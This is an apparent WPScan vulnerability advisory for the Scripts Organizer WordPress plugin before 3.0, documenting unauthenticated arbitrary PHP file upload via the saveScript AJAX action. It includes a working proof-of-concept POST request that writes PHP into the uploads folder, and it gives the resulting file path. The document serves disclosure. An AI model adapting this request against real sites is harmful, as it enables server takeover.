WordPress Plugin Vulnerabilities
Scripts Organizer < 3.0 - Unauthenticated Arbitrary File Upload
Description
The plugin does not have capability and CSRF checks in the saveScript AJAX action, available to both unauthenticated and authenticated users, and does not validate user input in any way, which could allow unauthenticated users to put arbitrary PHP code in a file
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 295
action=saveScript&php_script=%22%3C%3Fphp+die('test')%3B%22&SCORG_enable_script=1&form_data=post_status%3Dpublish%26post_name%3Dtest%26post_author%3D1%26post_name%3Dtest%26post_ID%3D200%26post_title%3Dtest%26SCORG_enable_script%3D1%26SCORG_trigger_location%3Deverywhere%26SCORG_script_type%3Dphp
The file will be at https://example.com/wp-content/uploads/scripts-organizer/200.php
Affects Plugins
Fixed in 3.0 References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Ovidiu Maghetiu
Submitter
Ovidiu Maghetiu
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-09-05 (about 1 years ago)
Added
2022-09-05 (about 1 years ago)
Last Updated
2022-09-05 (about 1 years ago)
WPScan 